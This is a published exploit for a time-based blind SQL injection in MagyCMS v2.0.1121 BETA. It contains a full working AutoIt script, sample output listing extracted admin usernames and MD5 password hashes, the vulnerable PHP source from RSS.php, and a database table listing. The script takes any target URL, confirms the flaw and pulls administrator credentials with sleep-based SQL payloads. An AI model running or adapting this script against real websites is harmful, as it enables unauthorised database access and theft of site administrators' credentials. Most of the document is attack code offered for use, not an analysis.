1083.53360421294 ms. Need to fetch other: [9] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8 Responce Time: 1094.66155316143 ms. Need to fetch other: [8] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8e Responce Time: 1079.25520931559 ms. Need to fetch other: [7] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee Responce Time: 1089.64739495061 ms. Need to fetch other: [6] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee4 Responce Time: 1075.80823227561 ms. Need to fetch other: [5] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44 Responce Time: 1078.8765208783 ms. Need to fetch other: [4] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44c Responce Time: 1110.63264652718 ms. Need to fetch other: [3] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca Responce Time: 1081.87636987911 ms. Need to fetch other: [2] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6 Responce Time: 1079.1007891431 ms. Need to fetch other: [1] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6c Responce Time: 1100.79408534274 ms. Need to fetch other: [ *NONE* ] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- ---------------------------------------- Username: [manager] MD5 HASH: [04e8e47e68a7b58594fdcf994c5d490d] ---------------------------------------- ---------------------------------------- Username: [root] MD5 HASH: [e10adc3949ba59abbe56e057f20f883e] ---------------------------------------- ---------------------------------------- Username: [d] MD5 HASH: [326373da562269316790326c00a9972f] ---------------------------------------- ---------------------------------------- Username: [test] MD5 HASH: [74a5d1ffce472f0206dd48c8ee44ca6c] ---------------------------------------- ---------------------------------------- ---------------------------------------- [+] Usernames And MD5 passwords saved to : mainlog.txt [+] ---------------------------------------- ---------------------------------------- [+] Exploit Finished!. GooD Luck;) [+] ---------------------------------------- [+] Exit! [+] -------------------------------------------------------------------- Vulnerable Code Section: ========================== BEGIN =================================== //magycms/Framework/public/RSS.php?Page= /* Execute($query); if (!$hResult->NumRows()) return -1; $row = $hResult->FetchRow(); $ID = $row[0]; // Fetch category form DB; $query = "SELECT `Category` FROM $tbl_News_Config WHERE `ID`=$ID AND `site`=$SITEID"; $hResult = $db->Execute($query); if (!$hResult->NumRows()) return -1; $row = $hResult->FetchRow(); return $row[0]; } //////////////////// Opening database connection //////////////// $db = &ADONewConnection($DBType); $db->PConnect($DBServer,$DBUserName,$DBPassword,$DBName); // Switch to the specified charset if($DBType=="mysql") $db->Execute("SET NAMES \"$DBCharset\""); ///////////////////////// Get Site ID /////////////////////////// if (isset($_GET['site'])) { $SITEID = $_GET['site']; if (!is_numeric($SITEID)) $SITEID = 1; } else { $SITEID = 1; } ////////////////// Get site URL from DB ///////////////////////// $hResult = $db->Execute("SELECT `URL` FROM $tbl_Sites WHERE `ID`=$SITEID"); $Root_URL = "aaa"; if ($hResult->NumRows()) { $row = $hResult->FetchRow(); $Root_URL = $row[0]; } //echo($Root_URL."
"); ////////////////// Retrieving Language Prefixes ///////////////// $Lang_Prefix = array(); $hpResult = $db->Execute("SELECT `ID`, `Prefix` FROM $tbl_Lang WHERE `site`=$SITEID"); if($hpResult) { for($i = 0; $i < $hpResult->RowCount(); $i++) { $apResult = $hpResult->FetchRow(); $Lang_Prefix[$apResult[0]] = $apResult[1]; } } ///////////////////////// Determine language //////////////////// if (isset($_GET['lang'])) { $lang = $_GET['lang']; if (!is_numeric($lang)) $lang = GetSiteSetting('Default_lang'); } else { $lang = GetSiteSetting('Default_lang'); } ///////////////////////// Determine news Page and Category ////// $cat = -1; $page = ""; if (isset($_GET['Page'])) { $page = $_GET['Page']; $cat = getCatByPage($page); } //////////////////// Get Page information if such exists //////// $title = "News"; $text = ""; if ($page != "") { $pQuery = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID"; $hResult = $db->Execute($pQuery); if (!$hResult->NumRows()) return -1; $row = $hResult->FetchRow(); $ID = $row[0]; // Fetch Title and Text form DB; $pQuery = "SELECT Title, Text FROM $tbl_News_Config AS s INNER JOIN $tbl_News_Config_Data AS d ON s.ID = d.ID WHERE s.ID=$ID AND d.language=$lang AND site=$SITEID"; $hResult = $db->Execute($pQuery); if ($hResult->NumRows()) { $row = $hResult->FetchRow(); $title = $row[0]; $text = $row[1]; } } // Construct link to News page $mainLink = ($page == "") ? "" : $Root_URL.CLink::construct($page, $lang); ///////////////////////// GET NEWS ////////////////////////////// if ($cat == -1) $mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date` FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID` WHERE d.language=$lang AND s.`site`=$SITEID"; else $mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date` FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID` WHERE d.language=$lang AND s.`site`=$SITEID AND s.`Category`=$cat"; $hResult = $db->Execute($mainQuery); // check if there is something to echo if (!$hResult->NumRows()) die(); ///////////////////////// Echo News in RSS ////////////////////// CRSS::echoHeader($title, $mainLink, $text, getdate(), $Lang_Prefix[$lang]); for ($i = 0; $i < $hResult->NumRows(); $i++) { $row = $hResult->FetchRow(); $today = date("Y-m-d H:i:s"); $startDate = $row[4]; $endDate = $row[5]; $startDateIsOK = (substr($startDate, 0, 10) == "0000-00-00" || $today >= $startDate); $endDateIsOK = (substr($endDate, 0, 10) == "0000-00-00" || $today <= $endDate); if ( $startDateIsOK && $endDateIsOK ) { $link = $Root_URL.CURL::getFormattedURL(CLink::construct($page, $lang), "id", "{$row[0]}"); CRSS::echoItem($row[2], $link, $link, $row[1], $row[3]); } } CRSS::echoFooter(); ?> '); // echo RSS opening tags echo('\n'); if ($title != "") echo ("$title\n"); if ($link != "") echo ("$link\n"); if ($desc != "") echo ("$desc\n"); if ($lastBD != "") echo ("$lastBD Mon, 12 Sep 2005 18:37:00 GMT\n"); if ($lang != "") echo ("$lang en-us\n"); } public static function echoFooter () { // echo RSS closing tags echo(''); } public static function echoItem($title, $link, $guid, $pubDate, $desc) { // Strip undesired characters from description $desc = ereg_replace("&[^;]*;", "", $desc); $desc = strip_tags($desc); // Turn Published date into RFC format $time = strtotime($pubDate); $pubDate = gmdate("r", $time); // Echo the item echo ("\n"); if ($title != "") echo ("$title\n"); if ($link != "") echo ("$link\n"); if ($guid != "") echo ("$guid\n"); if ($pubDate != "") echo ("$pubDate\n"); if ($desc != "") echo ("$desc\n"); echo ("\n"); } } ?> */ ========================= END OF VULNERABLE CODE SECTION =========================== mysql> show tables \g +-------------------------+ | Tables_in_SNIP_SNIP_SNIP| +-------------------------+ | admin_menus | | admin_menus_category | | admin_menus_permissions | | admin_users | | banner_categories | | banners | | banners_data | | banners_struct | | cms_languages | | cms_messages_categories | | cms_messages_data | | cms_messages_struct | | cms_settings | | core_messages | | counter | +-------------------------+ 15 rows in set (0.00 sec) mysql> explain admin_users \g +----------+------------------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +----------+------------------+------+-----+---------+----------------+ | ID | int(10) unsigned | NO | PRI | NULL | auto_increment | | Username | varchar(100) | YES | | 0 | | | Password | varchar(100) | YES | | 0 | | | GUID | varchar(32) | YES | | 0 | | | Level | int(10) unsigned | YES | MUL | 0 | | | Name | varchar(100) | YES | | 0 | | | Email | varchar(45) | YES | | 0 | | | MID | int(10) unsigned | YES | | 0 | | +----------+------------------+------+-----+---------+----------------+ 8 rows in set (0.00 sec) ************************************************* A R E Y O U R E A D Y? LETS GOOOOOOOOOOOOOOOOOOOOOOOOOOO! ************************************************* #ce Global $USERNAMES_IN_ARRAY,$MD5HASHSTRINGSIN_ARRAY,$dd ;// COMMAND LINE // if $CmdLine[0]=0 Then MsgBox(64,"","This is a console application." & @CRLF & "Usage: " & @CRLF & @ScriptName & ' http://targetsite.tld') Exit EndIf $host=$CmdLine[1] if $host='' Then ConsoleWrite(@CRLF & '[+] Empty Command Line Argument? WTF? [+]' & @CRLF) Exit EndIf ConsoleWrite(@CRLF) $hellomsg= _StringRepeat('#',54) & @CRLF $allmsg=$hellomsg & '# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #' & @CRLF & _ '# Exploitation technique: Time Based #' & @CRLF & _ '# Author: AkaStep & BOT_25 #' & @CRLF & _ $hellomsg; ConsoleWrite($allmsg); $useragent='Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'; #cs First checking is here any internet connection? #ce $separator=@CRLF & _StringRepeat('-',40) & @CRLF; ConsoleWrite($separator & '[+] Verifying your internet connection.... Please Wait...[+] ' & $separator) Sleep(1500) $hcheckconnectionstatus='http://packetstormsecurity.org';// 100% TODD will kill me ASAP for this xD) HttpSetUserAgent($useragent) $is_offline_or_online=_INetGetSource($hcheckconnectionstatus,True); if @error Then ConsoleWrite($separator & "[+] Sorry Dude! It seems your machine is offline. [+] " & @CRLF & "[+] Can't continue...Exit. [+] " & $separator); Exit EndIf ConsoleWrite($separator & '[+] Inet Connection is OK .... [+] ' & $separator) $target=$host & "/magycms/Framework/public/RSS.php?Page=" ;// Vulnerable versions of magycms always panics here by exposing following message to public. $isvulnerable='Call to a member function NumRows() on a non-object';// Peace of Blah Blah Stuff :P $possiblevals='';//initializing of variable... $forusernames='';// initializing it too... for $i=28 to 61 $forusernames&=Chr(Asc("A")+$i) & @CRLF Next for $i=0 To 9 $possiblevals&=$i & @CRLF ; nums from 0 1 2 3 4 5 6 7 8 up to 9 Next ; then alphas from a b c d e up to f $forusernames&=$possiblevals; $possiblevals&='a' & @CRLF & 'b' & @CRLF & 'c' & @CRLF & 'd' & @CRLF & 'e' & @CRLF & 'f' & @CRLF $array=StringSplit($possiblevals,@CRLF,3) $bruteusernames=StringSplit($forusernames,@CRLF,3); $i='';//reset. ConsoleWrite($separator & '[+] Verifying is Target Site Vulnerable? Please wait...[+]' & $separator); $maybe=_INetGetSource($target & "'",TRUE) ;//verifying...Is target site vulnerable? if StringInStr($maybe,$isvulnerable,0) Then $true='vulnerable'; // GPC=OFF ConsoleWrite($separator & '[+] Reply from target site: [+]' & @CRLF & $separator & '[+] - - - - * Vulnerable! * - - - - . [+]' & $separator & @CRLF & _ '[+] Trying to get average value for sleep(1) if condition is TRUE...[+]' & @CRLF & $separator & '[+] Please wait... [+] ' & $separator & @CRLF); $additionalchecking_needed='false'; ;// Will check 3 times (with TRUE condition) to get optimal avg value. ;//////////////////// Responce time when condition is TRUE ////////////// local $docalc; for $i=1 to 3 $checkfirsttime=TimerInit(); HttpSetUserAgent($useragent); _INetGetSource($target & "' or (select if(8='8',sleep(1),0))-- AnD 9='9",True); $rtime=TimerDiff($checkfirsttime); $docalc+=$rtime; Next $checkfirsttime=''; $rtime=''; $i=''; $docalcavg=Int($docalc/3);//avg value for sleep(1). $docalc=''; ConsoleWrite($separator & '[+] AVG sleep timeout FOR TRUE CONDITION IS: ' & $docalcavg & ' ms [+]' & $separator); ;////////////// EOF TRUE CONDITION CHECKING /////////////////////////// ;////////////////////// WITH FALSE CONDITION /////////////////////////// for $i=1 to 3 $checkfirsttime=TimerInit(); HttpSetUserAgent($useragent); _INetGetSource($target & "' or (select if(8='index.php',sleep(1),0))-- AnD 9='9",True); $rtime=TimerDiff($checkfirsttime); $docalc+=$rtime; Next $checkfirsttime=''; $rtime=''; $i=''; $avgfalsecondition=Int($docalc/3); $docalc=''; ConsoleWrite($separator & '[+] AVG sleep timeout FOR FALSE CONDITION IS: ' & $avgfalsecondition & ' ms [+] ' & $separator); ;//////////////// END OF FALSE CONDITION /////////////////////////////// getusername();// Fetch usernames Baby)// Else $true='not vulnerable'; //GPC =ON ? ConsoleWrite($separator & '[+] Target Site is NOT vulnerable:( .Exit. [+]' & $separator) ;// Lazy to verify it using another technique. Exit EndIf Func getusername() ;//Brain f****cking Local $oldoffset=0 $USERNAMES=''; ConsoleWrite($separator & '[+] Getting To Fetch Username(s) from table... Please wait... [+] ' & $separator) $usernamen=''; $tyi=0; $x=0; $stopat=0; do $tyi+=1 $stopat+=1 if $tyi=21 Then $tyi=1; $x+=1 $USERNAMES&=$usernamen & @CRLF $usernamen='';//reset EndIf $limitval= ' limit 1 offset ' & $x if $x<6 and $stopat<=5160 Then for $q=1 To UBound($bruteusernames) - 2 $fetch_username=$target & "' or (select if(substr(Username," & $tyi & ",1)='" & $bruteusernames[$q] & "',sleep(1),0) from admin_users" &$limitval & ")-- AnD 4='4" & @CRLF $timer=TimerInit(); HttpSetUserAgent($useragent); $inethandle=_INetGetSource($fetch_username,True) $diftime=TimerDiff($timer); if ($diftime/$docalcavg)>=0.8 Then $usernamen&=$bruteusernames[$q] ConsoleWrite('[+] TRUE AT OFFSET [' & $x & '] Currently : [' & $usernamen & ']. Responce Time: ' & $diftime & ' ms. Logging to axa.txt... [+]' & @CRLF); FileWrite('axa.txt',$separator & @CRLF & '[+] TRUE AT OFFSET[' & $x & ']' & @CRLF & $usernamen & @CRLF & 'Current Payload: ' & $fetch_username & @CRLF &'Responce Time: ' & $diftime & ' ms ' & @CRLF & $separator) EndIf $timer=''; $inethandle=''; $diftime=''; Next ;// EndIf until $x=6 $USERNAMES_IN_ARRAY=StringSplit($USERNAMES,@CRLF,3); ; debug ok _ArrayDisplay($USERNAMES_IN_ARRAY); $y=''; for $i=0 to UBound($USERNAMES_IN_ARRAY) - 1 if Not $USERNAMES_IN_ARRAY[$i]='' Then $y+=1; ConsoleWrite($separator & '[#] Username' & $i & ' => [' & $USERNAMES_IN_ARRAY[$i] & '] [#]' & $separator) EndIf Next $i=''; ConsoleWrite($separator & '* Total ' & $y & ' users *' & $separator) $y=''; ConsoleWrite($separator & '[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]' & $separator) ConsoleWrite($separator & '[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait... [+]' & $separator) ;// debug ok! Exit // MD5EDPASSWORD();//Yeah baby it's time to fetch MD5 passwords.// EndFunc;=> getusername(); ;//Below:Get passwords Function. Func MD5EDPASSWORD() Local $stopat; Local $md5hash; $MD5HASHSTRINGS=''; if $true='vulnerable' Then for $rt=0 To 6 if not $md5hash='' Then $MD5HASHSTRINGS&=$md5hash & @CRLF EndIf $md5hash='';// we need reset obtained hash here if offset incremented. $stopat+=1; if $rt<6 And $stopat<=3072 Then for $x=1 to 32 ;// because => strlen('MD5-ED-STRING')=32 . We need loop through it. for $i=0 to UBound($array) - 2 $dynamicpayload="' or (select if(substr(Password," & $x & ",1)='" & $array[$i] & "',sleep(1),0) from admin_users limit 1 offset " & $rt & ")-- AND 5='5" $doittime=TimerInit(); HttpSetUserAgent($useragent); $trigger2=_INetGetSource($target & $dynamicpayload,TRUE) $responcetime=TimerDiff($doittime); if ($responcetime/$docalcavg) >=0.8 Then ;//Sleep()-ed. 99% chance that we got it! $md5hash&=$array[$i] $howmuchneeded=32-StringLen($md5hash); if $howmuchneeded='0' then $howmuchneeded=' *NONE* ' EndIf $tolog=$separator & '[+] TRUE AT OFFSET [' & $rt & '] [+]' & @CRLF & 'Currently MD5 hash is : ' & $md5hash & @CRLF & 'Responce Time: ' & $responcetime & ' ms.' & @CRLF & 'Need to fetch other: [' & $howmuchneeded & '] symbol(s). ' & @CRLF & 'Logging to axa.txt... ' & $separator ConsoleWrite($tolog); FileWrite('axa.txt',$tolog); $tolog=''; EndIf Next Next EndIf Next ;// DISPLAYING PLUS SAVING TO MAINLOG.TXT $MD5HASHSTRINGS_IN_ARRAY=StringSplit($MD5HASHSTRINGS,@CRLF,3); for $i=0 To UBound($USERNAMES_IN_ARRAY) - 2 if Not $USERNAMES_IN_ARRAY[$i]='' and Not $MD5HASHSTRINGS_IN_ARRAY[$i]='' Then $dd&=$separator & 'Username: [' & $USERNAMES_IN_ARRAY[$i] & '] MD5 HASH: [' & $MD5HASHSTRINGS_IN_ARRAY[$i] & ']' & $separator EndIf Next ConsoleWrite($separator & $dd & $separator) FileWrite(@ScriptDir & "\mainlog.txt",$separator & 'Target Site: ' & $host & @CRLF & $dd & @CRLF) ConsoleWrite($separator & '[+] Usernames And MD5 passwords saved to : mainlog.txt [+]' & $separator) for $i=0 to 2 Sleep(1000); Beep(200,300); Next ConsoleWrite($separator & '[+] Exploit Finished!. GooD Luck;) [+]' & $separator) ConsoleWrite('[+] Exit! [+]'); Exit; EndIf EndFunc;=> MD5EDPASSWORD(); #cs Thats All! ********************* AZERBAIJAN BLACK HATZ*********************************** Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL: =========================================================== packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru 1337day.com secunia.com securityhome.eu exploitsdownload.com exploit-db.com to all AA Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3.* =========================================================== Thanks + Respect to all friends! /AkaStep & BOT_25 #ce